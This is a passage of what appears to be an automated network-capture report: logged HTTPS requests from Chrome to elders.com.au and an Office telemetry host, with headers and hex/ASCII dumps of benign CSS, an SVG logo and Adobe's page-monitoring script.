                                                                                                                                    Data Ascii: viewer__content{height:500px}.pdfviewer:not(.cq-Editable-dom) .cmp-pdfviewer__full-window-borderless{height:100vh;position:fixed;width:100vw;top:0;left:0;z-index:9999}.pdfviewer.cq-Editable-dom .cmp-pdfviewer__full-window-borderless{height:500px}.aem-G
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 6f 6e 65 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 32 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 36 36 37 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65
                                                                                                                                    Data Ascii: one;width:33.33333333%}.aem-Grid.aem-Grid--3>.aem-GridColumn.aem-GridColumn--default--2{float:left;clear:none;width:66.66666667%}.aem-Grid.aem-Grid--3>.aem-GridColumn.aem-GridColumn--default--3{float:left;clear:none;width:100%}.aem-Grid.aem-Grid--3>.ae
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 65 6d 2d 47 72 69 64 2d 2d 34 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 6f 66 66 73 65 74 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 35 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 32 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 35 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 32 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63
                                                                                                                                    Data Ascii: em-Grid--4>.aem-GridColumn.aem-GridColumn--offset--default--4{margin-left:100%}.aem-Grid.aem-Grid--5>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:20%}.aem-Grid.aem-Grid--5>.aem-GridColumn.aem-GridColumn--default--2{float:left;c
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 36 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 36 36 37 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 36 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 35 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 38 33
                                                                                                                                    Data Ascii: dColumn--default--3{float:left;clear:none;width:50%}.aem-Grid.aem-Grid--6>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:66.66666667%}.aem-Grid.aem-Grid--6>.aem-GridColumn.aem-GridColumn--default--5{float:left;clear:none;width:83
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 37 2e 31 34 32 38 35 37 31 34 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 35 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 37 31 2e 34 32 38 35 37 31 34 33 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61
                                                                                                                                    Data Ascii: d--7>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:57.14285714%}.aem-Grid.aem-Grid--7>.aem-GridColumn.aem-GridColumn--default--5{float:left;clear:none;width:71.42857143%}.aem-Grid.aem-Grid--7>.aem-GridColumn.aem-GridColumn--defa
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 32 35 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 33 37 2e 35 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e
                                                                                                                                    Data Ascii: 25%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn--default--3{float:left;clear:none;width:37.5%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:50%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    53192.168.2.449826162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC645OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:18 UTC598INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 29 Feb 2024 03:45:04 GMT
                                                                                                                                    etag: W/"0-2386f26fb1bdc0"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Age: 409653
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210161-DFW
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1709578051.675756,VS0,VS0,VE1
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb5398df7a2cce-DFW


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    54192.168.2.449825162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC657OUTGET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:18 UTC629INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    content-disposition: attachment; filename="el-logo-2.svg"
                                                                                                                                    last-modified: Tue, 22 Nov 2022 06:53:39 GMT
                                                                                                                                    etag: W/"ebc-5ee09a1ba22c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc10066-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730658879.828968,VS0,VS0,VE425
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 650
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb5398dc1f6bcb-DFW
                                                                                                                                    2024-11-05 08:03:18 UTC740INData Raw: 65 62 63 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 36 20 32 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 2e 31 32 34 31 20 39 2e 33 37 36 37 43 37 33 2e 39 31 30 39 20 39 2e 30 31 38 30 31 20 37 33 2e 31 31 39 37 20 38 2e 39 38 36 33 36 20 37 32 2e 32 30 31 38 20 38 2e 39 39 36 39 31 43 37 31 2e 31 32 35 37 20 39 2e 30 31 38 30 31 20 37 30 2e 32 31 38 34 20 39 2e 32 35 30 31 31 20 36 39 2e 34 38 20 39 2e 36 34 30 34 35 43 36 38 2e 35 35 31 36 20 39 2e 30 37 30 37 36 20 36 37 2e 34 39 36 36 20 38 2e 39 30 31 39 36 20 36 36 2e
                                                                                                                                    Data Ascii: ebc<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 20 34 38 2e 35 33 38 35 20 31 37 2e 32 35 37 34 20 34 38 2e 39 33 39 34 20 31 37 2e 31 39 34 31 43 34 39 2e 31 35 30 34 20 31 37 2e 31 36 32 35 20 34 39 2e 32 39 38 31 20 31 37 2e 31 30 39 37 20 34 39 2e 34 31 34 31 20 31 37 2e 30 37 38 31 43 35 33 2e 30 35 33 38 20 31 35 2e 37 38 30 35 20 35 34 2e 34 30 34 32 20 31 33 2e 37 37 36 20 35 34 2e 38 30 35 31 20 31 33 2e 30 35 38 36 43 35 35 2e 33 34 33 32 20 31 32 2e 31 30 39 31 20 35 35 2e 34 35 39 32 20 31 30 2e 38 33 32 36 20 35 34 2e 35 39 34 31 20 39 2e 38 39 33 36 35 43 35 33 2e 36 36 35 37 20 38 2e 39 30 31 39 36 20 35 30 2e 36 30 36 33 20 38 2e 32 31 36 32 32 20 34 36 2e 39 31 33 38 20 31 30 2e 38 33 32 36 43 34 34 2e 35 36 31 32 20 31 32 2e 34 39 39 35 20 34 32 2e 35 33 35 36 20 31 34 2e 37 36 37 37
                                                                                                                                    Data Ascii: 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 39 20 33 2e 38 35 39 31 33 20 32 35 2e 33 37 31 20 33 2e 34 37 39 33 34 43 32 36 2e 35 31 30 34 20 32 2e 34 34 35 34 36 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 43 32 37 2e 33 39 36 36 20 31 2e 32 33 32 32 32 20 32 37 2e 31 33 32 39 20 30 2e 35 38 38 36 38 32 20 32 36 2e 34 34 37 31 20 30 2e 34 37 32 36 33 33 43 32 33 2e 35 35 36 35 20 2d 30 2e 30 33 33 37 35 39 34 20 32 31 2e 37 36 33 20 2d 30 2e 30 31 32 36 35 39 38 20 31 39 2e 39 33 37 39 20 30 2e 30 30 38 34 33 39 38 37 43 31 36 2e 34 37 37 35 20 30 2e 30 36 31 31 38 39 31 20 31 32 2e 38 34 38 34 20 31 2e 32 39 35 35 32 20 31 31 2e 30 32 33 32 20 32 2e 38 31 34 37 43 39 2e 31 38 37 35 38 20 34 2e 33 34 34 34 33 20 38 2e 34 33 38 35 33 20 36 2e 38
                                                                                                                                    Data Ascii: 9 3.85913 25.371 3.47934C26.5104 2.44546 27.0485 1.64367 27.0485 1.64367C27.3966 1.23222 27.1329 0.588682 26.4471 0.472633C23.5565 -0.0337594 21.763 -0.0126598 19.9379 0.00843987C16.4775 0.0611891 12.8484 1.29552 11.0232 2.8147C9.18758 4.34443 8.43853 6.8
                                                                                                                                    2024-11-05 08:03:18 UTC301INData Raw: 30 39 34 31 20 37 35 2e 34 34 30 36 20 31 30 2e 30 39 34 31 43 37 35 2e 36 34 31 31 20 39 2e 38 35 31 34 35 20 37 35 2e 34 38 32 38 20 39 2e 35 32 34 34 20 37 35 2e 30 38 31 39 20 39 2e 34 30 38 33 35 4d 33 35 2e 39 36 33 31 20 31 33 2e 38 31 38 32 43 33 30 2e 38 33 35 39 20 31 39 2e 35 30 34 36 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 43 32 38 2e 32 35 31 32 20 31 36 2e 35 39 32 38 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 43 33 35 2e 37 30 39 39 20 31 30 2e 31 35 37 34 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 43 33 37 2e 31 32 33 36 20 31 32 2e 37 39 34 39 20 33 35 2e 39 37 33 36 20 31 33 2e
                                                                                                                                    Data Ascii: 0941 75.4406 10.0941C75.6411 9.85145 75.4828 9.5244 75.0819 9.40835M35.9631 13.8182C30.8359 19.5046 29.6015 17.8588 29.6015 17.8588C28.2512 16.5928 31.2051 13.9237 31.2051 13.9237C35.7099 10.1574 36.6699 12.0353 36.6699 12.0353C37.1236 12.7949 35.9736 13.
                                                                                                                                    2024-11-05 08:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    55192.168.2.449819162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC426OUTGET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:18 UTC684INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    access-control-expose-headers: *
                                                                                                                                    Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                    etag: W/"15a2-MVUJigmi2LrilKBEw9gkUr3cbLw"
                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-served-by: cache-sjc10046-SJC, cache-sjc10025-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730563129.199387,VS0,VS0,VE29
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb5398d810474c-DFW
                                                                                                                                    2024-11-05 08:03:18 UTC685INData Raw: 31 35 61 32 0d 0a 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 41 64 6f 62 65 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 74 6f 20 79 6f 75 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 59 6f 75 20 6d 61 79 20 6f 62 74 61 69 6e 20 61 20 63 6f 70 79 0a 20 2a 20 6f 66 20 74 68 65 20 4c 69 63 65 6e 73 65 20 61 74 20 68 74
                                                                                                                                    Data Ascii: 15a2/* * Copyright 2024 Adobe. All rights reserved. * This file is licensed to you under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. You may obtain a copy * of the License at ht
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 7b 0a 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 2f 2a 20 65 73 6c 69 6e 74 2d 65 6e 76 20 62 72 6f 77 73 65 72 20 2a 2f 0a 20 20 66 75 6e 63 74 69 6f 6e 20 73 61 6d 70 6c 65 52 55 4d 28 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 29 20 7b 0a 20 20 20 20 2f 2f 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 2d 6e 65 78 74 2d 6c 69 6e 65 20 6d 61 78 2d 6c 65 6e 0a 20 20 20 20 63 6f 6e 73 74 20 74 69 6d 65 53 68 69 66 74 20 3d 20 28 29 20 3d 3e 20 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3f 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 20 3a 20 44 61 74 65 2e 6e 6f 77 28 29 20 2d 20 77 69 6e 64 6f 77 2e 68 6c 78 2e 72 75 6d 2e 66 69 72 73 74 52 65 61 64 54 69 6d 65 29 3b 0a 20 20 20 20 74 72 79
                                                                                                                                    Data Ascii: { 'use strict'; /* eslint-env browser */ function sampleRUM(checkpoint, data) { // eslint-disable-next-line max-len const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime); try
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 61 74 20 28 5b 5e 20 5d 2b 29 20 5c 28 28 2e 2b 29 5c 29 2f 2c 20 27 24 31 40 24 32 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 20 61 74 20 2f 2c 20 27 40 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 72 69 6d 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 20 2f 2a 20 65 72 72 6f 72 20 73 74 72 75 63 74 75 72 65 20 77 61 73 20 6e 6f 74 20 61 73 20 65 78 70 65 63 74 65 64 20 2a 2f 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 72 72 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65
                                                                                                                                    Data Ascii: .replace(/at ([^ ]+) \((.+)\)/, '$1@$2') .replace(/ at /, '@') .trim(); } catch (err) { /* error structure was not as expected */ } return errData; }; window.addEve
                                                                                                                                    2024-11-05 08:03:18 UTC1369INData Raw: 75 72 6c 2c 20 6f 72 69 67 69 6e 20 7d 20 3d 20 6e 65 77 20 55 52 4c 28 60 2e 72 75 6d 2f 24 7b 77 65 69 67 68 74 7d 24 7b 75 72 6c 50 61 72 61 6d 73 7d 60 2c 20 73 61 6d 70 6c 65 52 55 4d 2e 63 6f 6c 6c 65 63 74 42 61 73 65 55 52 4c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 6f 64 79 20 3d 20 6f 72 69 67 69 6e 20 3d 3d 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 20 3f 20 6e 65 77 20 42 6c 6f 62 28 5b 72 75 6d 44 61 74 61 5d 2c 20 7b 20 74 79 70 65 3a 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 27 20 7d 29 20 3a 20 72 75 6d 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 75 72 6c 2c 20 62 6f 64 79 29 3b 0a 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: url, origin } = new URL(`.rum/${weight}${urlParams}`, sampleRUM.collectBaseURL); const body = origin === window.location.origin ? new Blob([rumData], { type: 'application/json' }) : rumData; navigator.sendBeacon(url, body);
                                                                                                                                    2024-11-05 08:03:18 UTC754INData Raw: 64 65 74 61 69 6c 3a 20 7b 20 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 20 7d 20 7d 29 29 3b 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 2f 2f 20 73 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 61 77 72 79 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 74 72 79 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 73 63 72 69 70 74 53 72 63 20 3d 20 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 0a 20 20 20 20 20 20 3f 20 6e 65 77 20 55 52 4c 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 2e 6f 72 69 67 69 6e
                                                                                                                                    Data Ascii: detail: { checkpoint, data } })); } catch (error) { // something went awry } } try { const scriptSrc = (document.currentScript && document.currentScript.src) ? new URL(document.currentScript.src, window.location.origin).origin
                                                                                                                                    2024-11-05 08:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    56192.168.2.44982113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 486
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                    x-ms-request-id: bbcd7168-d01e-002b-5940-2e25fb000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080318Z-157b9fd754f6hqf4hC1SN1580c0000000460000000000hvz
                                                                                                                                    x-fd-int-roxy-purgeid: 0
